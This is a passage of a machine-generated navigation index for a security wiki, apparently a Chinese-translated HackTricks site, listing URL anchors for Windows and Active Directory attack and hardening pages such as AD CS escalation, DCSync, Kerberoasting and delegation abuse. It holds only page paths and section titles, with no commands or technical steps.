ing/active-directory-methodology/ad-certificates/domain-escalation.html#
攻击-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#攻击-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#攻击-3--manage-certificates-extension-abuse-setextension","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ntlm-relay-到-ad-cs-http-端点--esc8","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#无安全扩展---esc9","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#弱证书映射---esc10","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用情形-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用案例-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#将-ntlm-中继到-icpr---esc11","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-1","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#使用-yubihsm-获取对-adcs-ca-的-shell-访问---esc12","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-2","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#oid-group-link-abuse---esc13","windows-hardening/active-directory-methodol
ogy/ad-certificates/domain-escalation.html#解释-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-3","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#易受攻击的证书续期配置---esc14","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#说明-6","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用场景-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#具体操作","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ekuwu-application-policiescve-2024-49019---esc15","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-4","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#ca-上禁用安全扩展全局-esc16","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#解释-6","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#滥用-5","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#使用证书破坏林被动语态说明","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#由被入侵的-cas-导致的林信任破坏","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#授予外部主体的-enrollment-权限","windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#参考资料","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#ad-cs-domain-persistence","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#使用被盗-ca-证书伪造证书---dpersist1","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#在强证书映射强制执行2025下的操作","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#信任恶意-ca-证书---
dpersist2","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#恶意错误配置---dpersist3","windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.html#references","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#ad-cs-证书盗窃","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#我可以用证书做什么","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#导出证书使用-crypto-apis--theft1","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#通过-dpapi-盗取用户证书--theft2","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#机器证书盗窃通过-dpapi--theft3","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#查找证书文件--theft4","windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.html#ntlm-credential-theft-via-pkinit--theft5-unpac-the-hash","windows-hardening/active-directory-methodology/ad-certificates.html#ad-certificates","windows-hardening/active-directory-methodology/ad-certificates.html#introduction","windows-hardening/active-directory-methodology/ad-certificates.html#components-of-a-certificate","windows-hardening/active-directory-methodology/ad-certificates.html#special-considerations","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-authorities-cas-in-active-directory-ad","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-acquisition-client-certificate-request-flow","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-templates","windows-hardening/active-directory-methodology/ad-certificates.html#certificate-enrollment","windows-hardening/active-directory-methodology/ad-certificates.html#template-enrollment-rights","windows-hardening/active-directory-methodology/ad-certificates.html#enterprise-ca-enrollment-rights","windows
-hardening/active-directory-methodology/ad-certificates.html#additional-issuance-controls","windows-hardening/active-directory-methodology/ad-certificates.html#methods-to-request-certificates","windows-hardening/active-directory-methodology/ad-certificates.html#证书认证","windows-hardening/active-directory-methodology/ad-certificates.html#kerberos-认证过程","windows-hardening/active-directory-methodology/ad-certificates.html#安全通道-schannel-认证","windows-hardening/active-directory-methodology/ad-certificates.html#ad-证书服务枚举","windows-hardening/active-directory-methodology/ad-certificates.html#最近的漏洞与安全更新-2022-2025","windows-hardening/active-directory-methodology/ad-certificates.html#微软强化时间表-kb5014754","windows-hardening/active-directory-methodology/ad-certificates.html#检测与强化增强","windows-hardening/active-directory-methodology/ad-certificates.html#参考文献","windows-hardening/active-directory-methodology/ad-information-in-printers.html#打印机中的信息","windows-hardening/active-directory-methodology/ad-information-in-printers.html#打印机配置","windows-hardening/active-directory-methodology/ad-information-in-printers.html#捕获凭据","windows-hardening/active-directory-methodology/ad-information-in-printers.html#方法1--netcat监听器","windows-hardening/active-directory-methodology/ad-information-in-printers.html#方法-2--完整的恶意-ldap-服务器推荐","windows-hardening/active-directory-methodology/ad-information-in-printers.html#最近的回传漏洞2024-2025","windows-hardening/active-directory-methodology/ad-information-in-printers.html#施乐-versalink--cve-2024-12510--cve-2024-12511","windows-hardening/active-directory-methodology/ad-information-in-printers.html#佳能-imagerunner--imageclass--通告-2025年5月20日","windows-hardening/active-directory-methodology/ad-information-in-printers.html#自动化枚举--利用工具","windows-hardening/active-directory-methodology/ad-information-in-printers.html#加固与检测","windows-hardening/active-directory-methodology/ad-information-in-printers.html#参考文献","windows-hardening/active-directory-methodology/ad-dns-records.html#ad-dns
-记录","windows-hardening/active-directory-methodology/ad-dns-records.html#创建修改记录-adidns-欺骗","windows-hardening/active-directory-methodology/ad-dns-records.html#powermad--invoke-dnsupdate-powershell","windows-hardening/active-directory-methodology/ad-dns-records.html#impacket--dnsupdatepy--python","windows-hardening/active-directory-methodology/ad-dns-records.html#bloodyad","windows-hardening/active-directory-methodology/ad-dns-records.html#常见攻击原语","windows-hardening/active-directory-methodology/ad-dns-records.html#检测与加固","windows-hardening/active-directory-methodology/ad-dns-records.html#参考文献","windows-hardening/active-directory-methodology/adws-enumeration.html#active-directory-web-services-adws-enumeration--stealth-collection","windows-hardening/active-directory-methodology/adws-enumeration.html#什么是-adws","windows-hardening/active-directory-methodology/adws-enumeration.html#soapy--原生-python-客户端","windows-hardening/active-directory-methodology/adws-enumeration.html#主要特性","windows-hardening/active-directory-methodology/adws-enumeration.html#安装操作员主机","windows-hardening/active-directory-methodology/adws-enumeration.html#stealth-ad-collection-workflow","windows-hardening/active-directory-methodology/adws-enumeration.html#编写-msds-allowedtoactonbehalfofotheridentity-rbcd","windows-hardening/active-directory-methodology/adws-enumeration.html#检测与加固","windows-hardening/active-directory-methodology/adws-enumeration.html#详细的-adds-日志记录","windows-hardening/active-directory-methodology/adws-enumeration.html#sacl-canary-objects","windows-hardening/active-directory-methodology/adws-enumeration.html#工具总结","windows-hardening/active-directory-methodology/adws-enumeration.html#参考文献","windows-hardening/active-directory-methodology/asreproast.html#asreproast","windows-hardening/active-directory-methodology/asreproast.html#asreproast-1","windows-hardening/active-directory-methodology/asreproast.html#破解","windows-hardening/active-directory-methodology/asreproast.html#持久性","windows-hardenin
g/active-directory-methodology/asreproast.html#asreproast-无需凭证","windows-hardening/active-directory-methodology/asreproast.html#参考","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#badsuccessor-privilege-escalation-via-delegated-msa-migration-abuse","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#概述","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#攻击前提条件","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#枚举易受攻击的-ou","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#利用步骤","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#自动化","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#后期利用","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#检测与狩猎","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#缓解措施","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#另见","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#参考文献","windows-hardening/active-directory-methodology/bloodhound.html#bloodhound--other-active-directory-enumeration-tools","windows-hardening/active-directory-methodology/bloodhound.html#ad-explorer","windows-hardening/active-directory-methodology/bloodhound.html#快速使用","windows-hardening/active-directory-methodology/bloodhound.html#adrecon","windows-hardening/active-directory-methodology/bloodhound.html#bloodhound-图形可视化","windows-hardening/active-directory-methodology/bloodhound.html#部署-docker-ce","windows-hardening/active-directory-methodology/bloodhound.html#收集器","windows-hardening/active-directory-methodology/bloodhound.html#group3r","windows-hardening/active-directory-methodology/bloodhound.html#pingcastle","windows-hardening/active-directory-methodology/constrained-de
legation.html#constrained-delegation","windows-hardening/active-directory-methodology/constrained-delegation.html#constrained-delegation-1","windows-hardening/active-directory-methodology/custom-ssp.html#custom-ssp","windows-hardening/active-directory-methodology/custom-ssp.html#custom-ssp-1","windows-hardening/active-directory-methodology/dcshadow.html#dcshadow","windows-hardening/active-directory-methodology/dcshadow.html#使用-dcshadow-创建后门","windows-hardening/active-directory-methodology/dcshadow.html#shadowception---使用-dcshadow-授予-dcshadow-权限无修改权限日志","windows-hardening/active-directory-methodology/dcsync.html#dcsync","windows-hardening/active-directory-methodology/dcsync.html#dcsync-1","windows-hardening/active-directory-methodology/dcsync.html#enumeration","windows-hardening/active-directory-methodology/dcsync.html#本地利用","windows-hardening/active-directory-methodology/dcsync.html#远程利用","windows-hardening/active-directory-methodology/dcsync.html#持久性","windows-hardening/active-directory-methodology/dcsync.html#缓解措施","windows-hardening/active-directory-methodology/dcsync.html#参考","windows-hardening/active-directory-methodology/diamond-ticket.html#diamond-ticket","windows-hardening/active-directory-methodology/diamond-ticket.html#diamond-ticket-1","windows-hardening/active-directory-methodology/dsrm-credentials.html#dsrm-凭据","windows-hardening/active-directory-methodology/dsrm-credentials.html#缓解措施","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#外部森林域---单向入站或双向","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#枚举","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#初始访问","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#冒充","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#登录","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.ht
ml#sid-历史滥用","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#完整的用户冒充方式","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#外部森林域---单向出站","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#枚举","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#出站信任","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#trust-account-attack","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#收集明文信任密码","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#参考","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#golden-gmsadmsa-攻击托管服务账户密码的离线推导","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#概述","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#golden-gmsa--golden-dmsa-攻击","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#先决条件","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#golden-gmsa--dmsa","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#检测与缓解","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#工具","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#参考文献","windows-hardening/active-directory-methodology/golden-ticket.html#golden-ticket","windows-hardening/active-directory-methodology/golden-ticket.html#golden-ticket-1","windows-hardening/active-directory-methodology/golden-ticket.html#绕过常见检测","windows-hardening/active-directory-methodology/golden-ticket.html#缓解措施","windows-hardening/active-directory-methodology/golden-ticket.html#参考文献","windows-hardening/active-directory-methodology/kerberoast.html#kerberoast","windows-hardening/active-directory-methodology/kerberoast.html#kerberoast-1","windows-hardening/active-directory-methodology/kerberoast
.html#关键点","windows-hardening/active-directory-methodology/kerberoast.html#攻击","windows-hardening/active-directory-methodology/kerberoast.html#opsec-和仅-aes-环境","windows-hardening/active-directory-methodology/kerberoast.html#破解","windows-hardening/active-directory-methodology/kerberoast.html#持久性--滥用","windows-hardening/active-directory-methodology/kerberoast.html#检测","windows-hardening/active-directory-methodology/kerberoast.html#缓解--加固","windows-hardening/active-directory-methodology/kerberoast.html#无域账户的-kerberoastas-请求的-st","windows-hardening/active-directory-methodology/kerberoast.html#参考","windows-hardening/active-directory-methodology/kerberos-authentication.html#kerberos-身份验证","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#kerberos-double-hop-problem","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#introduction","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#unconstrained-delegation","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#credssp","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#workarounds","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#invoke-command","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#注册-pssession-配置","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#portforwarding","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#openssh","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#参考","windows-hardening/active-directory-methodology/lansweeper-security.html#lansweeper-滥用凭证收集秘密解密与部署-rce","windows-hardening/active-directory-methodology/lansweeper-security.html#1-通过-honeypot-收集扫描凭证ssh-示例","windows-hardening/active-directory-methodology/lansweeper-security.html#2-ad-acl-abuse-通过将自己添加到应用管理员组获得远程访问","windows-hardening/active-direc
tory-methodology/lansweeper-security.html#3-在主机上解密-lansweeper-配置的机密","windows-hardening/active-directory-methodology/lansweeper-security.html#4-lansweeper-deployment--system-rce","windows-hardening/active-directory-methodology/lansweeper-security.html#检测与加固","windows-hardening/active-directory-methodology/lansweeper-security.html#相关主题","windows-hardening/active-directory-methodology/lansweeper-security.html#参考资料","windows-hardening/active-directory-methodology/laps.html#laps","windows-hardening/active-directory-methodology/laps.html#基本信息","windows-hardening/active-directory-methodology/laps.html#检查是否已激活","windows-hardening/active-directory-methodology/laps.html#laps-密码访问","windows-hardening/active-directory-methodology/laps.html#lapstoolkit","windows-hardening/active-directory-methodology/laps.html#dumping-laps-passwords-with-crackmapexec","windows-hardening/active-directory-methodology/laps.html#-使用-laps-密码-","windows-hardening/active-directory-methodology/laps.html#laps-持久性","windows-hardening/active-directory-methodology/laps.html#到期日期","windows-hardening/active-directory-methodology/laps.html#后门","windows-hardening/active-directory-methodology/laps.html#参考","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-ad-abuse","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-枚举--发现","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#python","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#在没有域会话的情况下从网络枚举","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#powershell","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#在没有域会话的情况下从网络枚举-1","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#从域内部枚举","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-基本滥用","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#访问数据库","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-r
ce","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-基本黑客技巧","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-受信任链接","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#powershell-滥用","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#metasploit","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#手动---openquery","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#手动---execute","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#本地权限提升","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#sccm-管理点-ntlm-中继-osd-秘密提取","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#over-pass-the-hashpass-the-key","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#overpass-the-hashpass-the-key-ptk","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#更隐蔽的版本","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#参考","windows-hardening/active-directory-methodology/pass-the-ticket.html#pass-the-ticket","windows-hardening/active-directory-methodology/pass-the-ticket.html#pass-the-ticket-ptt","windows-hardening/active-directory-methodology/pass-the-ticket.html#在平台之间交换linux和windows票据","windows-hardening/active-directory-methodology/pass-the-ticket.html#pass-the-ticket攻击","windows-hardening/active-directory-methodology/pass-the-ticket.html#参考","windows-hardening/active-directory-methodology/password-spraying.html#password-spraying--brute-force","windows-hardening/active-directory-methodology/password-spraying.html#password-spraying","windows-hardening/active-directory-methodology/password-spraying.html#获取密码策略","windows-hardening/active-directory-methodology/password-spraying.html#从-linux或所有系统进行利用","windows-hardening/active-directory-methodology/password-spraying.html#识别并接管-password-must-change-at-next-l
ogon-accounts-samr","windows-hardening/active-directory-methodology/password-spraying.html#暴力破解","windows-hardening/active-directory-methodology/password-spraying.html#kerberos-pre-auth-spraying-with-ldap-targeting-and-pso-aware-throttling-spearspray","windows-hardening/active-directory-methodology/password-spraying.html#outlook-web-access","windows-hardening/active-directory-methodology/password-spraying.html#google","windows-hardening/active-directory-methodology/password-spraying.html#okta","windows-hardening/active-directory-methodology/password-spraying.html#参考资料","windows-hardening/active-directory-methodology/printnightmare.html#printnightmare-windows-print-spooler-rcelpe","windows-hardening/active-directory-methodology/printnightmare.html#1-易受攻击的组件与-cve","windows-hardening/active-directory-methodology/printnightmare.html#2-利用技术","windows-hardening/active-directory-methodology/printnightmare.html#21-远程域控制器妥协-cve-2021-34527","windows-hardening/active-directory-methodology/printnightmare.html#22-本地权限提升任何支持的-windows2021-2024","windows-hardening/active-directory-methodology/printnightmare.html#23-spoolfool-cve-2022-21999--绕过-2021-修复","windows-hardening/active-directory-methodology/printnightmare.html#3-检测与狩猎","windows-hardening/active-directory-methodology/printnightmare.html#4-缓解与加固","windows-hardening/active-directory-methodology/printnightmare.html#5-相关研究--工具","windows-hardening/active-directory-methodology/printnightmare.html#参考文献","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#强制-ntlm-特权认证","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#sharpsystemtriggers","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#打印机后台处理程序服务滥用","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#在域中查找-windows-服务器","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#查找监听的spooler服务","windows-hardening/active-direct
ory-methodology/printers-spooler-service-abuse.html#请求服务对任意主机进行身份验证","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#结合不受限制的委托","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#rcp-强制身份验证","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#privexchange","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#在windows内部","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#defender-mpcmdrun","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#mssql","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#certutil","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#html-注入","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#通过电子邮件","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#mitm","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#其他强制和钓鱼-ntlm-认证的方法","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#破解-ntlmv1","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#特权组","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#具有管理权限的知名组","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#账户操作员","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#adminsdholder-组","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#ad-回收站","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#域控制器访问","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#权限提升","windows-hardening/active-directory-methodology/privileged-groups-and-token-p
rivileges.html#backup-operators","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#本地攻击","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#ad-攻击","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#dnsadmins","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#执行任意-dll","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#wpad-记录用于-mitm","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#事件日志读取器","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#exchange-windows-permissions","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#hyper-v-管理员","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#利用示例","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#组织管理","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#权限利用和命令","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#references","windows-hardening/active-directory-methodology/rdp-sessions-abuse.html#rdp-sessions-abuse","windows-hardening/active-directory-methodology/rdp-sessions-abuse.html#rdp-process-injection","windows-hardening/active-directory-methodology/rdp-sessions-abuse.html#rdpinception","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#resource-based-constrained-delegation","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#basics-of-resource-based-constrained-delegation","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#new-concepts","windows-hardening/active-directory-methodology/resource-based-constrained-deleg
ation.html#attack-structure","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#攻击","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#创建计算机对象","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#配置基于资源的受限委派","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#执行完整的-s4u-攻击-windowsrubeus","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#linux-工具使用-impacket-进行端到端-rbcd2024","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#accessing","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#滥用不同的服务票证","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#枚举审计和清理","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#枚举配置了rbcd的计算机","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#清理--重置-rbcd","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#kerberos-错误","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#注释转发和替代方案","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#参考文献","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#sccm-管理点-ntlm-中继到-sql--osd-策略秘密提取","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#tldr","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#1-枚举未经身份验证的-mp-端点","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#2-将-mp-机器账户中继到-mssql","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#3-通过存储过程识别-osd-策略","windows
-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#31-查找未知计算机-guid可选","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#32-列出分配的策略","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#33--检索完整主体","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#4-解码和解密-blob","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#5-相关的-sql-角色和过程","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#6-检测与加固","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#另请参见","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#参考文献","windows-hardening/active-directory-methodology/security-descriptors.html#安全描述符","windows-hardening/active-directory-methodology/security-descriptors.html#安全描述符-1","windows-hardening/active-directory-methodology/security-descriptors.html#访问wmi","windows-hardening/active-directory-methodology/security-descriptors.html#访问-winrm","windows-hardening/active-directory-methodology/security-descriptors.html#远程访问哈希","windows-hardening/active-directory-methodology/sid-history-injection.html#sid-history-injection","windows-hardening/active-directory-methodology/sid-history-injection.html#sid-历史注入攻击","windows-hardening/active-directory-methodology/sid-history-injection.html#diamond-ticket-rubeus--krbtgt-aes256","windows-hardening/active-directory-methodology/sid-history-injection.html#golden-ticket-mimikatz-with-krbtgt-aes256","windows-hardening/active-directory-methodology/sid-history-injection.html#从-linux","windows-hardening/active-directory-methodology/sid-history-injection.html#参考","windows-hardening/active-directory-methodology/silver-ticket.html#silver-ticket","windows-hardening/active-directory-metho
dology/silver-ticket.html#silver-ticket-1","windows-hardening/active-directory-methodology/silver-ticket.html#在-linux-上","windows-hardening/active-directory-methodology/silver-ticket.html#在-windows-上","windows-hardening/active-directory-methodology/silver-ticket.html#示例mssql-服务-mssqlsvc--potato-提权到-system","windows-hardening/active-directory-methodology/silver-ticket.html#可用服务","windows-hardening/active-directory-methodology/silver-ticket.html#silver-tickets-事件-id","windows-hardening/active-directory-methodology/silver-ticket.html#持久化","windows-hardening/active-directory-methodology/silver-ticket.html#滥用-service-tickets","windows-hardening/active-directory-methodology/silver-ticket.html#cifs","windows-hardening/active-directory-methodology/silver-ticket.html#主机","windows-hardening/active-directory-methodology/silver-ticket.html#host--rpcss","windows-hardening/active-directory-methodology/silver-ticket.html#host--wsman-winrm","windows-hardening/active-directory-methodology/silver-ticket.html#ldap","windows-hardening/active-directory-methodology/silver-ticket.html#参考资料","windows-hardening/active-directory-methodology/skeleton-key.html#skeleton-key","windows-hardening/active-directory-methodology/skeleton-key.html#skeleton-key-attack","windows-hardening/active-directory-methodology/skeleton-key.html#mitigations","windows-hardening/active-directory-methodology/skeleton-key.html#references","windows-hardening/active-directory-methodology/TimeRoasting.html#timeroasting","windows-hardening/active-directory-methodology/TimeRoasting.html#how-to-attack","windows-hardening/active-directory-methodology/unconstrained-delegation.html#unconstrained-delegation","windows-hardening/active-directory-methodology/unconstrained-delegation.html#unconstrained-delegation-1","windows-hardening/active-directory-methodology/unconstrained-delegation.html#强制认证","windows-hardening/active-directory-methodology/unconstrained-delegation.html#缓解措施","windows-hardening/authentication-credentials-uac-an
d-efs/index.html#windows-安全控制","windows-hardening/authentication-credentials-uac-and-efs/index.html#applocker-策略","windows-hardening/authentication-credentials-uac-and-efs/index.html#检查","windows-hardening/authentication-credentials-uac-and-efs/index.html#绕过","windows-hardening/authentication-credentials-uac-and-efs/index.html#credentials-storage","windows-hardening/authentication-credentials-uac-and-efs/index.html#security-accounts-manager-sam","windows-hardening/authentication-credentials-uac-and-efs/index.html#local-security-authority-lsa---lsass","windows-hardening/authentication-credentials-uac-and-efs/index.html#lsa-secrets","windows-hardening/authentication-credentials-uac-and-efs/index.html#ntdsdit","windows-hardening/authentication-credentials-uac-and-efs/index.html#defender","windows-hardening/authentication-credentials-uac-and-efs/index.html#check","windows-hardening/authentication-credentials-uac-and-efs/index.html#加密文件系统-efs","windows-hardening/authentication-credentials-uac-and-efs/index.html#检查-efs-信息","windows-hardening/authentication-credentials-uac-and-efs/index.html#解密-efs-文件","windows-hardening/authentication-credentials-uac-and-efs/index.html#group-managed-service-accounts-gmsa","windows-hardening/authentication-credentials-uac-and-efs/index.html#滥用-acl-链式继承以读取-gmsa-管理密码-genericall---readgmsapassword","windows-hardening/authentication-credentials-uac-and-efs/index.html#laps","windows-hardening/authentication-credentials-uac-and-efs/index.html#ps-constrained-language-mode","windows-hardening/authentication-credentials-uac-and-efs/index.html#检查-1","windows-hardening/authentication-credentials-uac-and-efs/index.html#绕过-1","windows-hardening/authentication-credentials-uac-and-efs/index.html